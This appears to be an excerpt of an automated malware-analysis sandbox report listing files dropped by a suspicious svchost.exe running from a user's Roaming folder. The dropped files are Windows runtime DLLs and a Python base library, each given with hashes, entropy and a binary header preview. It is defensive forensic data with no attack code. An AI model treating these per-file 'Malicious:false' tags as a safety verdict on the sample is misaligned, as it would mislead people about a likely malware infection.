                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
